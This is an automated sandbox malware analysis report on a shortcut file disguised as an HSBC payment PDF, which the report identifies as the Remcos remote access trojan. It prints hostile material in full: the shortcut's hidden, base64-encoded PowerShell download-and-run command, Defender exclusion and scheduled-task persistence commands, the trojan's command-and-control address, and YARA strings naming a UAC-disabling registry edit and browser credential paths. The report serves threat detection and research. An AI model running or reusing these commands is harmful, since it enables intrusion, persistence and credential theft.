Edit tour

Windows Analysis Report
Payment Advice__HSBC Banking.pdf.lnk

Overview

General Information

Sample name:	Payment Advice__HSBC Banking.pdf.lnk
Analysis ID:	1482979
MD5:	a38b0a4d0768ba8ce7c73904b55ee9ff
SHA1:	a1a13ef45fcf88eaff3dcffba1fb2608aa07e3c8
SHA256:	3f2491926888db2c9d6c7b1a426ff41e1cd4a13bc922156a814b9fe3032ff809
Tags:	HSBClnk
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Remcos RAT

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Remcos

Sigma detected: Scheduled temp file as task from temp location

Windows shortcut file (LNK) starts blacklisted processes

Yara detected AntiVM3

Yara detected Remcos RAT

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Contains functionalty to change the wallpaper

Delayed program exit found

Drops PE files with a suspicious file extension

Encrypted powershell cmdline option found

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

PowerShell case anomaly found

Powershell drops PE file

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious PowerShell Parameter Substring

Suspicious powershell command line found

Uses an obfuscated file name to hide its real file extension (double extension)

Uses schtasks.exe or at.exe to add and modify task schedules

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 6856 cmdline: "C:\Windows\System32\cmd.exe" cMD /c PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7020 cmdline: PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g MD5: 04029E121A0CFA5991749937DD22A1D9)

PuttyTest777.pif (PID: 2108 cmdline: "C:\Users\user\AppData\Roaming\PuttyTest777.pif" MD5: 3F69729A8F2B22E625BB984F28758EBC)

powershell.exe (PID: 6180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PuttyTest777.pif" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7216 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HODoCxSdp.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7560 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7276 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HODoCxSdp" /XML "C:\Users\user\AppData\Local\Temp\tmpE952.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PuttyTest777.pif (PID: 7424 cmdline: "C:\Users\user\AppData\Roaming\PuttyTest777.pif" MD5: 3F69729A8F2B22E625BB984F28758EBC)

svchost.exe (PID: 7108 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

HODoCxSdp.exe (PID: 7476 cmdline: C:\Users\user\AppData\Roaming\HODoCxSdp.exe MD5: 3F69729A8F2B22E625BB984F28758EBC)

schtasks.exe (PID: 7760 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HODoCxSdp" /XML "C:\Users\user\AppData\Local\Temp\tmpF9EC.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

HODoCxSdp.exe (PID: 7804 cmdline: "C:\Users\user\AppData\Roaming\HODoCxSdp.exe" MD5: 3F69729A8F2B22E625BB984F28758EBC)

HODoCxSdp.exe (PID: 7812 cmdline: "C:\Users\user\AppData\Roaming\HODoCxSdp.exe" MD5: 3F69729A8F2B22E625BB984F28758EBC)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "204.10.160.230:7983:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-O7QOC3", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x691e0:$a1: Remcos restarted by watchdog! 0x69738:$a3: %02i:%02i:%02i:%03i 0x69abd:$a4: * Remcos v
00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x641e4:$str_a1: C:\Windows\System32\cmd.exe 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6320c:$str_b2: Executing file: 0x64328:$str_b3: GetDirectListeningPort 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63e30:$str_b7: \update.vbs 0x63234:$str_b9: Downloaded file: 0x63220:$str_b10: Downloading file: 0x632c4:$str_b12: Failed to upload file: 0x642f0:$str_b13: StartForward 0x64310:$str_b14: StopForward 0x63dd8:$str_b15: fso.DeleteFile " 0x63d6c:$str_b16: On Error Resume Next 0x63e08:$str_b17: fso.DeleteFolder " 0x632b4:$str_b18: Uploaded file: 0x63274:$str_b19: Unable to delete: 0x63da0:$str_b20: while fso.FileExists(" 0x63749:$str_c0: [Firefox StoredLogins not found]
00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x63100:$s1: \Classes\mscfile\shell\open\command 0x63160:$s1: \Classes\mscfile\shell\open\command 0x63148:$s2: eventvwr.exe
0000000B.00000002.4092646965.0000000001238000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000011.00000002.1759395246.000000000104A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000C.00000002.1787198536.0000000003869000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000C.00000002.1787198536.0000000003869000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x687a8:$a1: Remcos restarted by watchdog! 0xdddc8:$a1: Remcos restarted by watchdog! 0x153008:$a1: Remcos restarted by watchdog! 0x68d00:$a3: %02i:%02i:%02i:%03i 0xde320:$a3: %02i:%02i:%02i:%03i 0x153560:$a3: %02i:%02i:%02i:%03i 0x69085:$a4: * Remcos v 0xde6a5:$a4: * Remcos v 0x1538e5:$a4: * Remcos v
00000003.00000002.1748001168.0000000003729000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000003.00000002.1748001168.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x67d88:$a1: Remcos restarted by watchdog! 0xdd3a8:$a1: Remcos restarted by watchdog! 0x1525e8:$a1: Remcos restarted by watchdog! 0x682e0:$a3: %02i:%02i:%02i:%03i 0xdd900:$a3: %02i:%02i:%02i:%03i 0x152b40:$a3: %02i:%02i:%02i:%03i 0x68665:$a4: * Remcos v 0xddc85:$a4: * Remcos v 0x152ec5:$a4: * Remcos v
Process Memory Space: PuttyTest777.pif PID: 2108	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: PuttyTest777.pif PID: 2108	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x78991:$a1: Remcos restarted by watchdog! 0x78ec8:$a3: %02i:%02i:%02i:%03i 0x79481:$a3: %02i:%02i:%02i:%03i 0x790ea:$a4: * Remcos v
Process Memory Space: PuttyTest777.pif PID: 7424	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: HODoCxSdp.exe PID: 7476	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: HODoCxSdp.exe PID: 7476	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: HODoCxSdp.exe PID: 7476	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x17010:$a1: Remcos restarted by watchdog! 0x17547:$a3: %02i:%02i:%02i:%03i 0x17b00:$a3: %02i:%02i:%02i:%03i 0x17769:$a4: * Remcos v
Process Memory Space: HODoCxSdp.exe PID: 7812	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: HODoCxSdp.exe PID: 7812	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x9f86:$a1: Remcos restarted by watchdog! 0xa4bd:$a3: %02i:%02i:%02i:%03i 0xaa76:$a3: %02i:%02i:%02i:%03i 0xa6df:$a4: * Remcos v
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.PuttyTest777.pif.37293a8.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
3.2.PuttyTest777.pif.37293a8.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x661e0:$a1: Remcos restarted by watchdog! 0x66738:$a3: %02i:%02i:%02i:%03i 0x66abd:$a4: * Remcos v
3.2.PuttyTest777.pif.37293a8.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x611e4:$str_a1: C:\Windows\System32\cmd.exe 0x61160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6020c:$str_b2: Executing file: 0x61328:$str_b3: GetDirectListeningPort 0x60c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60e30:$str_b7: \update.vbs 0x60234:$str_b9: Downloaded file: 0x60220:$str_b10: Downloading file: 0x602c4:$str_b12: Failed to upload file: 0x612f0:$str_b13: StartForward 0x61310:$str_b14: StopForward 0x60dd8:$str_b15: fso.DeleteFile " 0x60d6c:$str_b16: On Error Resume Next 0x60e08:$str_b17: fso.DeleteFolder " 0x602b4:$str_b18: Uploaded file: 0x60274:$str_b19: Unable to delete: 0x60da0:$str_b20: while fso.FileExists(" 0x60749:$str_c0: [Firefox StoredLogins not found]
3.2.PuttyTest777.pif.37293a8.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60100:$s1: \Classes\mscfile\shell\open\command 0x60160:$s1: \Classes\mscfile\shell\open\command 0x60148:$s2: eventvwr.exe
17.2.HODoCxSdp.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.2.HODoCxSdp.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x691e0:$a1: Remcos restarted by watchdog! 0x69738:$a3: %02i:%02i:%02i:%03i 0x69abd:$a4: * Remcos v
17.2.HODoCxSdp.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x641e4:$str_a1: C:\Windows\System32\cmd.exe 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6320c:$str_b2: Executing file: 0x64328:$str_b3: GetDirectListeningPort 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63e30:$str_b7: \update.vbs 0x63234:$str_b9: Downloaded file: 0x63220:$str_b10: Downloading file: 0x632c4:$str_b12: Failed to upload file: 0x642f0:$str_b13: StartForward 0x64310:$str_b14: StopForward 0x63dd8:$str_b15: fso.DeleteFile " 0x63d6c:$str_b16: On Error Resume Next 0x63e08:$str_b17: fso.DeleteFolder " 0x632b4:$str_b18: Uploaded file: 0x63274:$str_b19: Unable to delete: 0x63da0:$str_b20: while fso.FileExists(" 0x63749:$str_c0: [Firefox StoredLogins not found]
17.2.HODoCxSdp.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x63100:$s1: \Classes\mscfile\shell\open\command 0x63160:$s1: \Classes\mscfile\shell\open\command 0x63148:$s2: eventvwr.exe
17.2.HODoCxSdp.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.2.HODoCxSdp.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
17.2.HODoCxSdp.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
17.2.HODoCxSdp.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
12.2.HODoCxSdp.exe.3869dc8.3.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
12.2.HODoCxSdp.exe.3869dc8.3.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x661e0:$a1: Remcos restarted by watchdog! 0x66738:$a3: %02i:%02i:%02i:%03i 0x66abd:$a4: * Remcos v
12.2.HODoCxSdp.exe.3869dc8.3.unpack	REMCOS_RAT_variants	unknown	unknown	0x611e4:$str_a1: C:\Windows\System32\cmd.exe 0x61160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6020c:$str_b2: Executing file: 0x61328:$str_b3: GetDirectListeningPort 0x60c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60e30:$str_b7: \update.vbs 0x60234:$str_b9: Downloaded file: 0x60220:$str_b10: Downloading file: 0x602c4:$str_b12: Failed to upload file: 0x612f0:$str_b13: StartForward 0x61310:$str_b14: StopForward 0x60dd8:$str_b15: fso.DeleteFile " 0x60d6c:$str_b16: On Error Resume Next 0x60e08:$str_b17: fso.DeleteFolder " 0x602b4:$str_b18: Uploaded file: 0x60274:$str_b19: Unable to delete: 0x60da0:$str_b20: while fso.FileExists(" 0x60749:$str_c0: [Firefox StoredLogins not found]
12.2.HODoCxSdp.exe.3869dc8.3.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60100:$s1: \Classes\mscfile\shell\open\command 0x60160:$s1: \Classes\mscfile\shell\open\command 0x60148:$s2: eventvwr.exe
3.2.PuttyTest777.pif.379e9c8.4.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
12.2.HODoCxSdp.exe.38df3e8.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
3.2.PuttyTest777.pif.379e9c8.4.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x661e0:$a1: Remcos restarted by watchdog! 0x66738:$a3: %02i:%02i:%02i:%03i 0x66abd:$a4: * Remcos v
12.2.HODoCxSdp.exe.38df3e8.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x661e0:$a1: Remcos restarted by watchdog! 0x66738:$a3: %02i:%02i:%02i:%03i 0x66abd:$a4: * Remcos v
3.2.PuttyTest777.pif.379e9c8.4.unpack	REMCOS_RAT_variants	unknown	unknown	0x611e4:$str_a1: C:\Windows\System32\cmd.exe 0x61160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6020c:$str_b2: Executing file: 0x61328:$str_b3: GetDirectListeningPort 0x60c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60e30:$str_b7: \update.vbs 0x60234:$str_b9: Downloaded file: 0x60220:$str_b10: Downloading file: 0x602c4:$str_b12: Failed to upload file: 0x612f0:$str_b13: StartForward 0x61310:$str_b14: StopForward 0x60dd8:$str_b15: fso.DeleteFile " 0x60d6c:$str_b16: On Error Resume Next 0x60e08:$str_b17: fso.DeleteFolder " 0x602b4:$str_b18: Uploaded file: 0x60274:$str_b19: Unable to delete: 0x60da0:$str_b20: while fso.FileExists(" 0x60749:$str_c0: [Firefox StoredLogins not found]
12.2.HODoCxSdp.exe.38df3e8.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x611e4:$str_a1: C:\Windows\System32\cmd.exe 0x61160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6020c:$str_b2: Executing file: 0x61328:$str_b3: GetDirectListeningPort 0x60c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60e30:$str_b7: \update.vbs 0x60234:$str_b9: Downloaded file: 0x60220:$str_b10: Downloading file: 0x602c4:$str_b12: Failed to upload file: 0x612f0:$str_b13: StartForward 0x61310:$str_b14: StopForward 0x60dd8:$str_b15: fso.DeleteFile " 0x60d6c:$str_b16: On Error Resume Next 0x60e08:$str_b17: fso.DeleteFolder " 0x602b4:$str_b18: Uploaded file: 0x60274:$str_b19: Unable to delete: 0x60da0:$str_b20: while fso.FileExists(" 0x60749:$str_c0: [Firefox StoredLogins not found]
3.2.PuttyTest777.pif.379e9c8.4.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60100:$s1: \Classes\mscfile\shell\open\command 0x60160:$s1: \Classes\mscfile\shell\open\command 0x60148:$s2: eventvwr.exe
12.2.HODoCxSdp.exe.38df3e8.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60100:$s1: \Classes\mscfile\shell\open\command 0x60160:$s1: \Classes\mscfile\shell\open\command 0x60148:$s2: eventvwr.exe
3.2.PuttyTest777.pif.379e9c8.4.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
3.2.PuttyTest777.pif.379e9c8.4.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0xdcc20:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0xdd178:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v 0xdd4fd:$a4: * Remcos v
3.2.PuttyTest777.pif.379e9c8.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0xd6b40:$s1: \Classes\mscfile\shell\open\command 0xd6ba0:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe 0xd6b88:$s2: eventvwr.exe
12.2.HODoCxSdp.exe.38df3e8.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
12.2.HODoCxSdp.exe.38df3e8.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0xdcc20:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0xdd178:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v 0xdd4fd:$a4: * Remcos v
12.2.HODoCxSdp.exe.38df3e8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0xd6b40:$s1: \Classes\mscfile\shell\open\command 0xd6ba0:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe 0xd6b88:$s2: eventvwr.exe
12.2.HODoCxSdp.exe.3869dc8.3.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
